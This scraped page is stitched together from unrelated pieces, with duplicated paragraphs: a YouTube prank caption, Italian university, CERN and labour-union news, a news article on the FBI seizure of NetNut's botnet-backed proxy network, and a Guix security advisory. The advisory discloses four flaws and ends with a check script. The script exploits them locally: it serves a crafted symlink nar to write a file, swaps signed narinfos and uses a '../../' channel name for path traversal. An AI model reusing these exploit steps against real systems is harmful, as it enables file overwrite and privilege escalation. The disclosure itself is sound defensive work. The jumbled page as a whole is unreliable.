Long-range fart-issile, incoming 🎯💨 #shorts #funny #fartprank

#shorts #fartprank #prank #funny #funnyvideos #comedy
Instagram- GilstrapTV
Facebook - GilstrapTV
Twitter- GilstrapTV

Il centro di ricerca ARCO di Fondazione PIN (Polo di Prato dell’Università degli Studi di Firenze), in stretta collaborazione con il Comune di Vernio e la Società della Salute Area Pratese, ha lanciato un'importante iniziativa dedicata al benessere della popolazione anziana del territorio. Si tratta di un questionario mirato a raccogliere le opinioni e le esperienze dirette dei cittadini con più di 65 anni residenti nel Comune di Vernio e nelle zone vicine.
Il centro di ricerca ARCO di Fondazione PIN (Polo di Prato dell’Università degli Studi di Firenze), in stretta collaborazione con il Comune di Vernio e la Società della Salute Area Pratese, ha lanciato un'importante iniziativa dedicata al benessere della popolazione anziana del territorio. Si tratta di un questionario mirato a raccogliere le opinioni e le esperienze dirette dei cittadini con più di 65 anni residenti nel Comune di Vernio e nelle zone vicine.
Da ieri il Large Hadron Collider (LHC) del CERN è stato spento per lasciare spazio ai lavori di trasformazione che porteranno a High Luminosity LHC (HiLumi LHC), un upgrade dell'acceleratore LHC che entrerà in funzione intorno al 2030.
Sono aperte le iscrizioni all’AA 2026-2027! - Con una proposta solida di ben 152 corsi di laurea e un tasso di occupazione dei laureati magistrali che supera l’82% a un anno dal titolo, UniFi si conferma una scelta vincente per costruire il proprio futuro professionale. Scopri il manifesto a questo link!
Sono aperte le iscrizioni all’AA 2026-2027! - Con una proposta solida di ben 152 corsi di laurea e un tasso di occupazione dei laureati magistrali che supera l’82% a un anno dal titolo, UniFi si conferma una scelta vincente per costruire il proprio futuro professionale. Scopri il manifesto a questo link!

Several security issues (CVE IDs pending) have been identified in guix substitute, a helper utility invoked by
guix-daemon,
which enable a variety of harmful activities including remote privilege
escalation to the build daemon user, remote store corruption, and
potentially local disclosure of sensitive files accessible to the build
daemon user. All systems are affected, whether or not guix-daemon is running
with root privileges; the harm that can be done when guix-daemon runs without
root privileges is more limited. You are strongly advised to upgrade your
daemon now (see instructions below), carefully considering whether to pass
--no-substitutes to all guix commands when you do so (see note in Upgrading
section).
The remote exploitation of guix substitute only requires that the vulnerable
system attempt to download a binary substitute. Any configured substitute
server, including ones discovered using guix-daemon's --discover option, can
exploit this, and so can a man-in-the-middle (MITM), regardless of whether
https is used in the substitute server urls.
The local exploitation of guix substitute only requires the ability to connect
to guix-daemon's socket, which by default any user can do.
Separately, another security issue (CVE ID pending) was identified in guix pull and guix time-machine, which enables anyone who can control the channels
file used by these commands to cause a file to be created or overwritten
wherever the user running the command in question has permission to create
them. This is possible regardless of whether the channels file is evaluated in a
sandbox and whether the channels used are limited to those sharing an
introduction with a trusted channel. Due to limitations on the content of the
created or overwritten file, this primarily represents a denial-of-service
risk, though in theory it could do more.
Update 2026-07-06: if you are using the unprivileged
guix-daemon, as is the default on distros other than Guix System since version 1.5.0, and if you updated it between July 2nd and July 5th, you've probably been affected by this regression preventing substitutes from working. It is now fixed, but if you are stuck trying to upgrade, try passing--no-substitutes. If you can't reasonably upgrade without substitutes, you can either take your chances downgrading to the vulnerableguix-daemonand using it or try tinystar's workaround (doesn't apply to Guix on distributions other than Guix System).
Three distinct vulnerabilities have been identified affecting guix substitute,
with a fourth affecting guix pull and guix time-machine:
(CVE assignment pending) The procedure that Guile code uses to unpack
substitutes, restore-file in (guix serialization), was not hardened
against malicious input, but it was called to extract the substitute being
downloaded as it was being downloaded, rather than waiting until after the
entire archive had been obtained and its hash had been verified. These
facts together make it possible for any substitute server (or any entity that
can impersonate one) to write arbitrary files to any place on an affected
system that the daemon user has permission to write to. In the case of the
daemon running as root, that includes /etc/passwd.
To avoid depending on the X.509 Public Key Infrastructure, the procedure that
fetches metadata about available substitutes (called narinfos),
fetch-narinfos, does not verify server certificates, since the canonical
parts of narinfos need to be signed anyway to be considered valid.
Unfortunately the substitute URL is not one such canonical part, and so it
can be replaced with an attacker-controlled URL. If the substitute
downloaded doesn't match the signed hash in the narinfo, it will be rejected,
but by then it is too late: the substitute was extracted as it was being
downloaded, so the damage is already done.
This means that even though download-nar, the procedure responsible for
actually downloading the substitute, does itself verify server certificates,
using https in substitute server urls cannot limit who can exploit this, as
the certificate only needs to be appropriate for the attacker-controlled URL.
restore-file is also used by other utilities, including guix offload,
guix archive --extract, and guix challenge. These can all be exploited
in the same way if untrusted input is given to them.
(CVE assignment pending) The procedure that fetches metadata about available
substitutes (called narinfos), fetch-narinfos in (guix substitutes),
does not verify that the narinfo it got is the one it asked for, nor do any
of its callers in (guix scripts substitute). Consequently, it is possible
for a substitute server (or anyone who can impersonate one) to trick guix substitute into using any store item for which there is an authorized
substitute as a substitute for any other store item for which there is an
authorized substitute. The complete extent of harm that can be caused by this
depends in part on what store items an authorized substitute server has
signed or can be convinced to sign, but at minimum this can be used to cause
outdated and insecure versions of software to be used.
(CVE assignment pending) The implementation of guix substitute in (guix scripts substitute) permits file:// URIs to be used both for specifying
substitute server URIs (where to look for narinfos) and for specifying within
narinfos where to download the corresponding archive from. It does not
distinguish between --substitute-urls passed on the guix-daemon command
line and --substitute-urls passed on the guix command line (client-side),
with the latter taking precedence over the former. Opening of these file://
URIs follows symbolic links. Consequently, an untrusted client may cause any
file that the daemon can read to be read. If a given line of it doesn't look
like a valid narinfo line (it uses recutils format), guix substitute may
throw an exception, causing a backtrace containing that line to be passed
through to the client. So, for example, a file containing a single line
containing only a secret passphrase may have its contents revealed to any
local user if the daemon user can read it.
Additionally, when a file:// URI is used as the URI of a nar to download,
it may be written to the store if it happens to be a valid nar ("normalized
archive") as used by Guix and Nix. This is unlikely, though.
In addition to possibly causing secrets to be disclosed, this can also be
used to interfere with the reading of any file being read by any process that
the daemon user could trace, through the use of files in /proc/PID/fd.
(CVE assignment pending) The procedure which guix pull and guix time-machine use to authenticate channels, authenticate-channel in (guix channels), passed a cache key derived from the channel name to
authenticate-repository in (guix git-authenticate). This cache key was
used to determine a filename for storing previously-authenticated commit IDs
in. If the channel name was of the form "../../../../newfile", it could have
caused "newfile" to be created in the user's home directory. It may also have
overwritten "newfile" if it already existed, but only if it already looked
like a Scheme-syntax list of strings, since the contents would have to have
first been read and processed before new contents would have been written.
In the event that a write is performed, the output will only include a
Scheme-syntax comment, newline, and list of hexadecimal strings corresponding
to git commit identifiers. This makes it difficult to use for a practical
attack other than a denial-of-service, but note that since it can target
files in /proc, a sufficiently creative and informed attacker may be able
to exploit this further.
Realistically, this vulnerability can only be exploited when fetching remote channel files with the newly-added mechanism for doing so.
Vulnerabilities (1) and (2) can be mitigated against remote attackers by not
using substitutes, either by passing --no-substitutes to guix-daemon or
passing --no-substitutes to all guix commands. It's always possible to turn
substitutes back on for an individual client, though, so this doesn't work to
defend against a local attacker exploiting (1), (2), or (3), which cannot be
mitigated and must be fixed by updating. Vulnerability (4) can be mitigated by
not running guix pull or guix time-machine with an untrusted channels file.
A test for the presence of these vulnerabilities is available at the end of this post. One can run this code with:
guix repl -- guix-substitute-and-pull-vuln-check.scmThis will finish with a sequence of 4 lines, beginning with restore-file,
fetch-narinfos, file-uris, and cache-key respectively, each followed by a
colon, a space, and either vulnerable or not vulnerable depending on whether
the running guix-daemon has the indicated vulnerability or not. If all 4 lines
contain not vulnerable, then guix repl will exit with status code 0,
otherwise it will exit with status code 1.
Some of the tests can fail to produce a result in some cases. In this case the
output following the test name will start with error:. A test that fails to
produce a result should be regarded as inconclusive.
The restore-file and fetch-narinfos tests may fail to produce a result if no
substitutes are authorized, or if no authorized substitutes for the current
guix's cfunge, hello, or sed packages can be accessed through any of the
configured substitute urls. The restore-file test may fail to produce a result
if cfunge is reachable from some garbage collection root, such as a
profile. The cache-key test may fail to produce a result if network access to
codeberg to fetch a small portion of the history of the guix-science channel
is not available, which can be worked around by editing the script's definition
of guix-science-url to be any URL (or a filename) at which a copy of the
guix-science repository can be found.
These security issues have been fixed by a series of 11 commits, starting with ed0a9721f8a20d6ddcf6a0495302f502b3f7bb17 and ending with 2ef8ed9f0df53bddf14bdecc2ea48c2d233213cc as part of pull request #9665. Users should make sure they have upgraded to commit 897832f374dcdc9eeaf19d01e70b9a92fccfc68c or any later commit to be protected from these vulnerabilities. Upgrade instructions are in the following section.
Fixing vulnerability (1) involved hardening restore-file so that it detects
and rejects invalid directory entry names. Specifically, entry names must be
unique, in strictly ascending order, not empty, not equal to "." or "..", and
not containing "/" or null bytes. Additionally, procedures currently used as the
#:dump-file argument to restore-file were modified to insist on creating the
target file afresh and never follow symbolic links.
The inspiration for that last change came from looking at the implementation of
nar-parsing in parse in nix/libutil/archive.cc, where it was determined that
that implementation was not vulnerable, but was about as close to vulnerable as
it could get without actually being vulnerable, only barely being saved by the
fact that the filesystem primitives used all refused to follow symbolic links or
accept an existing target (see this commit
message for
details). To avoid wasting another 3 hours trying to determine this the next
time anyone tries looking at it with a critical eye, that implementation was
also rewritten to be stricter and more obviously secure. It is perhaps not
surprising that the same code led to CVE-2024-45593 in Nix when it was modified
to use more lax filesystem primitives from std::filesystem.
Fixing vulnerability (2) involved modifying fetch-narinfos to not include a
result if it didn't match what was asked for.
Fixing vulnerability (3) involved modifying (guix scripts substitute) to
verify that all substitute urls from untrusted sources are not file:// urls,
and that all nar urls in narinfos are not file:// urls (except when a special
flag is set, which is only done in the test suite).
Some additional hardening was also done, so that substitutes are restored inside a temporary directory and only moved to their final store item path once the hash is verified. This still restores them before verifying the hash, so it wouldn't have prevented (1), but it does ensure that attacker-controlled contents are not present at the path of what may have once been a valid store item (and may still be considered by some users or programs to be valid if they haven't taken note of a recent garbage collection). The narinfo-reading code was also modified to reject as invalid any narinfo file whose StorePath, References, or Deriver field contained a path that did not obey the store item path syntax requirements. A nice side-effect of this is that we now have procedures for verifying the syntax of store item paths.
Fixing vulnerability (4) involved changing how cache-key was computed by
default for users of authenticate-repository. Rather than being derived from
the name of the channel or (for guix git authenticate) the url of the
repository, cache-key is now derived from the ID of the introductory commit,
which is a very safe hexadecimal string. This also avoids some strange and
potentially-dangerous behavior in which cached authenticated commit IDs could be
shared between two channels that happen to share a name but are otherwise
completely different. Additional hardening of authenticate-repository was
added to turn all occurrences of . in cache-key into - so that even if
non-default cache keys were provided, it would not be possible to escape the
cache directory.
Due to the severity of this security advisory, we strongly recommend all users
to upgrade guix and guix-daemon immediately.
Note: The astute reader may have noticed a dilemma: the fastest way to get updates is through substitutes, and the way to mitigate the most severe of the remotely-exploitable vulnerabilities is to disable substitutes. Whether to pass
--no-substitutesis therefore a judgment call that must take into consideration how long it has been since these vulnerabilities were made public, how exposed the network paths between your system and your substitute servers are, how feasible it is for the system in question to build guix by itself (which will depend in part on how long it has been since you last upgraded), whether the system in question has multiple users, and of course, your threat model.
For Guix System, the
procedure
is to reconfigure the system after a guix pull, either restarting
guix-daemon or rebooting. For example:
guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemonwhere /run/current-system/configuration.scm is the current system
configuration but could, of course, be replaced by a system configuration file
of a user's choice.
For Guix on another distribution, one needs to guix pull with sudo, as
the guix-daemon runs as root, and restart the guix-daemon service, as
documented.
For example, on a system using systemd to manage services, run:
sudo --login guix pull
sudo systemctl restart guix-daemon.serviceNote that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.
restore-file vulnerability
with Christopher Baines and Andreas Enge; Christopher sends details to the
Security Response Team.file:// vulnerability
of guix substitute.guix substitute did not verify whether the narinfo it is getting is the one it
asked for.pull and time-machine vulnerability and
works on a fix. For the sake of convenience and because hints were available
publicly, it was decided that it should be promptly fixed and disclosed at the
same time as the other vulnerabilities.We would like to thank Jörg Thalheim for sharing the restore-file
vulnerability, Christopher Baines for verifying it and informing the Security
Response Team, and Andreas Enge for ensuring
that it reached Ludovic and Caleb and facilitating ongoing communication with
Jörg.
We would also like to thank John Kehayias of the Security Response Team for coordination and for requesting CVE IDs.
Below is code to check if your guix-daemon is vulnerable to the first three
vulnerabilities and your guix is vulnerable to the fourth. Save this file as
guix-substitute-and-pull-vuln-check.scm and run following the instructions
above, in "Mitigation."
(use-modules (git)
(guix build utils)
(guix derivations)
(guix channels)
(guix config)
(guix gexp)
(guix git)
(guix narinfo)
(guix packages)
(guix pki)
(guix utils)
(guix serialization)
(guix store)
(guix substitutes)
((gnu packages base) #:hide (which))
(gnu packages esolangs)
(srfi srfi-1)
(srfi srfi-26)
(srfi srfi-31)
(srfi srfi-34)
(rnrs bytevectors)
(ice-9 atomic)
(ice-9 binary-ports)
(ice-9 control)
(ice-9 match)
(ice-9 popen)
(ice-9 rdelim)
(ice-9 textual-ports)
(ice-9 threads)
(web response)
(web request)
(web uri)
(web server)
(web server http))
;; 1. restore-file
;; Craft an invalid nar, identify a substitutable path that doesn't exist (gc
;; if necessary), get its signed narinfo, start an http server, connect to
;; store, set substitute urls, ask to substitute the chosen path. Have http
;; server serve the signed narinfo with the URLs replaced with its own. When
;; the nar is requested, serve the invalid nar. Once the substitution errors
;; out (hash doesn't match), check whether the chosen file now exists with the
;; specified contents. We're vulnerable if and only if it does.
(define target-file
"/tmp/guix-restore-file-vulnerable")
(define target-substitutable-package
;; pick something obscure but in the main guix channel, so it is either not
;; currently valid or can probably be gc'ed. This is just to make the test
;; more reliable - in real exploitation, an attacker can sit around and wait
;; for any substitute request to be made, but here we need to provoke one in
;; a timely manner.
cfunge)
(define substitute-servers
(with-store store
(substitute-urls store)))
;; Grafts can cause package->derivation to actually start substituting outputs
;; of the derivation being computed, which means we'd have to gc it afterward.
(%graft? #f)
(define (package->path+narinfo store package)
(define path
(derivation->output-path (run-with-store store (lower-object package))))
(match (lookup-narinfos/diverse substitute-servers (list path)
valid-narinfo?)
((info) (values path info))
(() (values #f #f))))
(define (restore-file-vuln?)
(define-values (target-path target-info)
(call-with-values (lambda ()
(with-store store
(package->path+narinfo store
target-substitutable-package)))
(lambda (path info)
(unless info
(error "can't find substitutable path to test 'restore-file' with\n"))
(with-store store
(when (valid-path? store path)
(when (null? (delete-paths store (list path)))
(error "can't delete substitutable path to test 'restore-file' with\n"))))
(values path info))))
(define new-target-info-contents
(let* ((contents (narinfo-contents target-info))
(signature-index (string-contains contents "Signature:"))
(after-signature-index (string-index contents #\newline
signature-index))
(signed-contents (string-take contents (or after-signature-index
(string-length
contents)))))
(string-append signed-contents "
URL: example.nar
Compression: none
NarSize: 0\n")))
;; We can't delete target-file if it's owned by root, so overwrite it with
;; fresh, mostly-random contents each time, and check that the contents match.
(define test-contents
(format #f "VULNERABLE!~%~S:~S~%" (getpid) (random 100000000)))
(define test-nar
(call-with-output-bytevector
(lambda (port)
(for-each (lambda (s)
(write-string s port))
`("nix-archive-1"
"(" "type" "directory"
"entry" "(" "name" "a"
"node" "(" "type" "symlink"
"target" ,target-file ")" ")"
"entry" "(" "name" "a"
"node" "(" "type" "regular"
"contents" ,test-contents ")" ")"
")")))))
(define bad-request
(build-response #:code 400 #:reason-phrase "Unexpected request"))
(define target-uri-path
(string-append "/" (store-path-hash-part target-path) ".narinfo"))
(define nar-uri-path "/example.nar")
(define (handle request body)
(cond
((not (eq? (request-method request) 'GET))
(values bad-request ""))
((string=? (uri-path (request-uri request)) target-uri-path)
(format (current-error-port)
"Returning narinfo pointing to test nar~%")
(values (build-response #:code 200)
new-target-info-contents))
((string=? (uri-path (request-uri request)) nar-uri-path)
(format (current-error-port) "Returning test nar~%")
(values (build-response #:code 200)
test-nar))
(else
(values bad-request ""))))
(call-with-port (socket PF_INET SOCK_STREAM 0)
(lambda (sock)
(setsockopt sock SOL_SOCKET SO_REUSEADDR 1)
(bind sock (make-socket-address AF_INET INADDR_LOOPBACK 0))
(listen sock 5)
(let* ((port-number (sockaddr:port (getsockname sock)))
(substitute-url (string-append "http://localhost:"
(number->string port-number)
"/"))
(server-thread (call-with-new-thread
(lambda ()
(run-server handle http
`(#:socket ,sock))))))
(with-store store
(set-build-options store
#:substitute-urls (list substitute-url))
(guard (c ((store-error? c)
;; XXX doesn't actually cancel until something tries
;; connecting
(cancel-thread server-thread)
;;(join-thread server-thread)
(and (file-exists? target-file)
(string=? (call-with-input-file target-file
get-string-all)
test-contents))))
(build-things store (list target-path))
;; If the substitution actually completes without throwing then we
;; are most definitely vulnerable, but not just in 'restore-path'.
(error "!!!substitution of invalid nar completed???!!!")))))))
;; 2. fetch-narinfos
;; Identify two substitutable paths P1 and P2. Get P1 and P2's signed
;; narinfos, start an http server, connect to store, set substitute urls, ask
;; whether P1 and P2 are substitutable. Have http server serve P2's narinfo
;; when asked for P1's, and P1's when asked for P2's. If vulnerable, it will
;; report that both are substitutable, if not, it will report that neither
;; are.
;; We need two substitutable paths because the daemon<-->'guix substitute
;; --query' interface verifies that the info it gets back is for a path that
;; was requested, so the "replacement" path has to also be queried for
;; substitutability at the same time.
(define (fetch-narinfos-vuln?)
(define-values (hello-path hello-info)
(with-store store (package->path+narinfo store hello)))
(define-values (sed-path sed-info)
(with-store store (package->path+narinfo store sed)))
(define bad-request
(build-response #:code 400 #:reason-phrase "Unexpected request"))
(define hello-uri-path
(string-append "/" (store-path-hash-part hello-path) ".narinfo"))
(define sed-uri-path
(string-append "/" (store-path-hash-part sed-path) ".narinfo"))
(define (handle request body)
(cond
((not (eq? (request-method request) 'GET))
(values bad-request ""))
((string=? (uri-path (request-uri request)) hello-uri-path)
(format (current-error-port) "Returning sed when asked for hello~%")
;; Return the wrong result
(values (build-response #:code 200)
(narinfo-contents sed-info)))
((string=? (uri-path (request-uri request)) sed-uri-path)
(format (current-error-port) "Returning hello when asked for sed~%")
;; Return the wrong result
(values (build-response #:code 200)
(narinfo-contents hello-info)))
(else
(values bad-request ""))))
(unless (and hello-info sed-info)
(error "can't find substitutable paths to test 'fetch-narinfos' with"))
(call-with-port (socket PF_INET SOCK_STREAM 0)
(lambda (sock)
(setsockopt sock SOL_SOCKET SO_REUSEADDR 1)
(bind sock (make-socket-address AF_INET INADDR_LOOPBACK 0))
(listen sock 5)
(let* ((port-number (sockaddr:port (getsockname sock)))
(substitute-url (string-append "http://localhost:"
(number->string port-number)
"/"))
(server-thread (call-with-new-thread
(lambda ()
(run-server handle http
`(#:socket ,sock))))))
(with-store store
(set-build-options store
#:substitute-urls (list substitute-url))
(let ((substitutables
(substitutable-paths store (list hello-path sed-path))))
;; XXX doesn't actually cancel until something tries connecting
(cancel-thread server-thread)
;;(join-thread server-thread)
(not (null? substitutables))))))))
;; 3. file-uris
;; Create a fifo whose name is 32 nix-base32 characters followed by
;; ".narinfo", connect to store, set substitute urls to point to containing
;; directory, spawn a thread to block trying to open fifo write-only which
;; will subsequently set a flag and close the port, then ask whether some
;; store path with that hash is substitutable. It should fail in all cases.
;; Check whether the flag is set; if so, we're vulnerable, otherwise we're
;; not.
(define (file-uris-vuln?)
(call-with-temporary-directory
(lambda (directory)
(define testfifo
(string-append directory "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.narinfo"))
(define opened? (make-atomic-box #f))
(define store-item
(string-append (%store-prefix) "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-foo"))
(define open-thread
(begin
(mknod testfifo 'fifo #o744 0)
(call-with-new-thread
(lambda ()
(call-with-port (open testfifo O_WRONLY)
(lambda (port)
(atomic-box-set! opened? #t)))))))
(with-store store
(set-build-options store
#:substitute-urls (list (string-append "file://" directory)))
(guard (c ((store-error? c)
(cancel-thread open-thread)
(delete-file testfifo)
;; even though the file it is trying to open no longer
;; exists, the kernel doesn't give a result to open-thread
;; until someone ptraces it (or maybe sends a signal or
;; something).
;; (join-thread open-thread)
(atomic-box-ref opened?)))
(substitutable-paths store (list store-item))
(error "not supposed to get here!\n"))))))
;; 4. cache-key
;; Create a barebones git repository that is a valid channel, create a
;; <channel> that references it using a malformed name, set XDG_CACHE_HOME to
;; a directory inside a temporary directory (so that 'cache-directory' points
;; to a subdirectory of it), call authenticate-channel, see if a file outside
;; of XDG_CACHE_HOME gets created.
;; If you don't have Internet access, edit this to point to a local repository
;; containing at least commit 5a2d9baeda971df575c017669bca8eb8faa22ebd and its
;; ancestors, and the keyring branch.
(define guix-science-url
"https://codeberg.org/guix-science/guix-science.git")
(define (create-test-channel directory channel-name)
"Populate REPOSITORY with the necessary contents for it to be a valid
channel with 2 commits, then return three values: a <channel> for it with name
CHANNEL-NAME and an introduction to the first commit, the first commit, and
the second commit."
(define intro-commit
"b1fe5aaff3ab48e798a4cce02f0212bc91f423dc")
(define end-commit ;; The commit following intro-commit
"5a2d9baeda971df575c017669bca8eb8faa22ebd")
(define fingerprint
"CA4F 8CF4 37D7 478F DA05 5FD4 4213 7701 1A37 8446")
(define git %git) ;; From (guix config), guix has a hard dependency on git
(with-directory-excursion directory
(invoke git "init"
;; Silence warning
"--initial-branch=main")
(invoke git "remote" "add" "--" "origin" guix-science-url)
(invoke git "fetch" "--" "origin" end-commit)
(invoke git "checkout" "FETCH_HEAD")
(invoke git "fetch" "--" "origin" "refs/heads/keyring:keyring")
(values
(channel
(name channel-name)
(url (canonicalize-path directory))
(introduction (make-channel-introduction
intro-commit
(openpgp-fingerprint fingerprint))))
intro-commit
end-commit)))
(define (cache-key-vuln?)
(call-with-temporary-directory
(lambda (directory)
(let ((home (string-append directory "/home"))
(channel-repo (string-append directory "/channel-repo"))
(testfile (string-append directory "/testfile")))
(mkdir home)
(mkdir channel-repo)
(with-environment-variables `(("HOME" ,home)
("XDG_CACHE_HOME" ,(string-append home
"/.cache")))
(call-with-values
(lambda ()
(create-test-channel channel-repo
(string->symbol "../../../../../testfile")))
(lambda (channel first-commit last-commit)
(authenticate-channel channel channel-repo last-commit
#:keyring-reference-prefix "")))
(file-exists? testfile))))))
;; Results
(define vulnerabilities
(list (list "restore-file" restore-file-vuln?)
(list "fetch-narinfos" fetch-narinfos-vuln?)
(list "file-uris" file-uris-vuln?)
(list "cache-key" cache-key-vuln?)))
(define (call-with-errors-to-string proc)
(define tag (make-prompt-tag))
(call-with-prompt tag
(lambda ()
(with-throw-handler #t
proc
(rec (self key . args)
(let* ((stack (make-stack #t
1 ;self ;; Causes make-stack to return #f??
tag
))
(frames (stack-length stack))
(frame (stack-ref stack 0)))
(define error-string
(match args
(((or (? string? proc) (? symbol? proc))
(? string? message) (args ...) . rest)
(call-with-output-string
(lambda (port)
(display-error frame port proc message args
rest))))
(args
(call-with-output-string
(lambda (port)
(print-exception port frame key args))))))
(display-backtrace stack (current-error-port))
(display error-string (current-error-port))
(abort-to-prompt tag (string-append "error: "
(string-trim-both
error-string)))))))
(lambda (_ . args)
(apply values args))))
(define results
(map (match-lambda
((name proc)
(list name (if (string? proc)
proc ;; pass message through
(call-with-errors-to-string proc)))))
vulnerabilities))
(for-each (match-lambda
((name vulnerable?)
(format #t "~a: ~a~%"
name
(if (boolean? vulnerable?)
(if vulnerable? "vulnerable" "not vulnerable")
vulnerable?))))
results)
(exit (if (any second results) 1 0)) The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut, a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks after KrebsOnSecurity published findings from multiple security firms connecting NetNut to the Popa botnet, a collection of at least two million devices that have been compromised by malicious software with little or no consent from victims.

The NetNut homepage today was replaced by this seizure banner from the FBI.
On June 19, three different security firms issued similar findings: That NetNut is a residential proxy network which populates a botnet called Popa, and distributes software for devices commonly found in homes, such as smart TVs and streaming boxes. NetNut’s software turns those systems into always-on residential proxy nodes that are rented to others, who predominantly use them to relay abusive and intrusive Internet traffic, such as mass content scraping, advertising fraud, and account takeover activity.
Earlier today, NetNut’s homepage was replaced with a seizure notice from the FBI and the Internal Revenue Service Criminal Investigation division. The seizure notice thanked Google, Lumen, Shadowserver and other industry partners for their help in dismantling hundreds of domains tied to the Popa botnet, which experts say has long been synonymous with NetNut’s residential proxy infrastructure.
In a blog post published today, the Google Threat Intelligence Group (GTIG) said NetNut’s proxy network is widely resold and white-labeled by a number of third-party proxy providers, and that its services are heavily sought out by cybercriminals seeking to obfuscate the source of their malicious traffic. The GTIG said that in a single week during June 2026, they observed 316 distinct clusters of threat actors using suspected NetNut exit nodes, including cybercriminal and espionage groups.
“These bad actors can use NetNut to mask their origin IP address when accessing victim environments, accessing their own infrastructure, and conducting password spray attacks,” Google’s GTIG wrote. “Furthermore, when a consumer device becomes an exit node, unauthorized network traffic passes through it. This means bad actors can access other private devices on the same home network, effectively exposing them to Internet threats.”
Google said it disabled Google accounts and services used by NetNut for malware command and control, and that it shared technical intelligence on NetNut’s software development kits (SDKs) and backend infrastructure with platform providers, law enforcement and research firms. The company also disabled apps known to bundle NetNut’s various SDKs.
Omer Weiss, legal counsel for NetNut parent Alarum Technologies, said the company was aware of the FBI seizure and cooperating with investigators.
“Alarum takes this matter seriously and will fully cooperate with law enforcement to ensure any misuse of its infrastructure is thoroughly investigated and those responsible are held to account,” Weiss said in a written statement.
Benjamin Brundage is founder of the proxy tracking service Synthient, one of the companies that published evidence last month linking the Popa botnet to NetNut and Alarum Technologies. Brundage said the domain seizures appear to have disrupted both the Popa botnet and the NetNut proxy network that rides on top of it.
Brundage said NetNut’s apparent demise is likely to be a great disadvantage for the cybercrime community, which was already reeling from legal actions by Google earlier this year that seized infrastructure for NetNut’s biggest competitor — IPIDEA.
“I think this takedown is going to have a big impact, because NetNut gained significant popularity after the IPIDEA takedown,” he said. “Also NetNut has been incredibly common among resellers, and they were on par with IPIDEA in terms of their daily traffic, quality, size, price per gigabyte, all of it.”

NetNut’s infrastructure, in a nutshell. Image: Black Lotus Labs, Lumen.
The NetNut and Popa botnet takedown may have another added benefit, Brundage said: Lessening the impact of large distributed denial-of-service botnets that have been built on the backs of poorly configured residential proxy services. In January, Synthient revealed how cybercriminals had built the world’s largest DDoS botnet (Kimwolf) by tunneling through IPIDEA proxy connections into the local networks of TV box owners, and infecting other Android-based devices behind the victim’s firewall.
While many of the bigger proxy providers took steps to block this activity, resellers of the major proxy networks have been far slower to respond to the threat, Brundage said.
“In terms of all these TV box devices getting compromised from the proxy network, it will have an impact on the DDoS botnets out there,” he said.
For its part, Google reckons today’s actions have caused “significant degradation to NetNut’s proxy network and its business operations, reducing the available pool of devices for the proxy operator by millions.” But the company warns that proxy networks can rebuild themselves by effectively reselling other proxy services, as IPIDEA has done over the past few months.
“Google has high confidence that many popular residential proxy brands are in fact whitelabeling the NetNut botnet,” the GTIG report concludes. “While we expect this disruption to have a larger ripple effect across the residential proxy ecosystem, observations after the disruption of IPIDEA proved that individual networks can appear resilient. What we have observed is that when faced with the degradation of their own botnet, proxy operators begin buying capacity from their competitors, effectively becoming a reseller. We recognize that creating a lasting disruption in this fluid ecosystem means we must scale our efforts to target the infrastructure of several interconnected providers.”
As KrebsOnSecurity has warned repeatedly, most of the no-name TV streaming boxes for sale on the major e-commerce websites either come pre-installed with residential proxy software, or require the installation of proxy SDKs in order to use the device for its stated purpose (streaming pirated movies, sporting events and TV shows). Google’s advice here is sound: When it comes to TV boxes, stick to name brands from reputable manufacturers, and then be sparing and judicious with any apps you choose to install.
The sketchy TV boxes that are being commandeered by the Popa botnet and other threats all come with or require the user to install unofficial Android operating systems that do not operate within the confines of Google’s Official Play Protect store. Google says consumers can confirm whether or not a device is built with the official Android TV OS and Play Protect certification by following these instructions.
Even people without TV streaming boxes can find their smart TVs enrolled in residential proxy networks, just by installing one of thousands of apps available for download on Samsung and LG smart TVs. In a report released last month, the proxy tracking company Spur found 42 percent of apps available for download via the webOS operating system on LG smart TVs include SDKs that turn one’s television into an always-on residential proxy node. More than a quarter of the apps made for Samsung’s Tizen operating system had similar residential proxy components, Spur found.

Image: Spur.us.
Update, 4:24 p.m. ET: Included a statement shared post-publication from an attorney representing NetNut parent Alarum Technologies.
Update, July 8, 2:34 p.m. ET: The website for Alarum Technologies — alarum[.]io — now also features a seizure notice from the FBI. The company’s stock has taken a beating since the FBI action, and is currently trading at $2.62 a share, a roughly 67 percent decline over the past week.



L’1 e il 2 luglio si è riunito a Roma, presso la sede GARR, il Board of Directors di GÉANT, l’organo di governo responsabile della direzione strategica e approvazione dei piani di attività della associazione e della supervisione dell’organizzazione.
Dal 1° luglio Piaggio aprirà l'ennesima procedura di solidarietà. Ancora una volta saranno gli operai a pagare il prezzo delle scelte aziendali, con meno salario e meno prospettive. Ma la situazione è ancora più grave.
Da domani iniziano le fermate delle linee in diversi reparti. Alcune produzioni termineranno già a metà luglio. Il lavoro manca. E non manca per una fatalità o per una crisi improvvisa. Manca perché da anni è assente una vera strategia industriale. Gli investimenti vengono rinviati, i nuovi progetti non arrivano e lo stabilimento viene lasciato vivere alla giornata, senza una prospettiva di rilancio.
Solo poche settimane fa si celebravano gli ottant'anni della Vespa. Discorsi, fotografie, autorità e applausi raccontavano l'eccellenza italiana e un marchio simbolo nel mondo. Finita la propaganda, però, resta la realtà: fermate produttive, solidarietà, salari che diminuiscono e un futuro sempre più incerto. È questa la distanza tra la narrazione e ciò che gli operai vivono ogni giorno.
Piaggio continua a utilizzare gli ammortizzatori sociali come uno strumento ordinario di gestione, trasferendo sui lavoratori e sulla collettività il costo delle proprie scelte. È inaccettabile che si continui a ricorrere alla solidarietà senza assumersi la responsabilità di rilanciare davvero il sito di Pontedera.
Per USB la solidarietà non può tradursi in un taglio dello stipendio. Se l'azienda sceglie questa strada, deve garantire l'integrazione salariale. Gli operai non possono diventare il bancomat a cui attingere ogni volta che vengono meno programmazione, investimenti e visione industriale.
Anche questa volta tutto viene deciso all'ultimo momento. I lavoratori vengono convocati quando le decisioni sono già state prese, senza un confronto reale e senza una trattativa vera. Si chiede soltanto di ratificare un accordo già scritto.
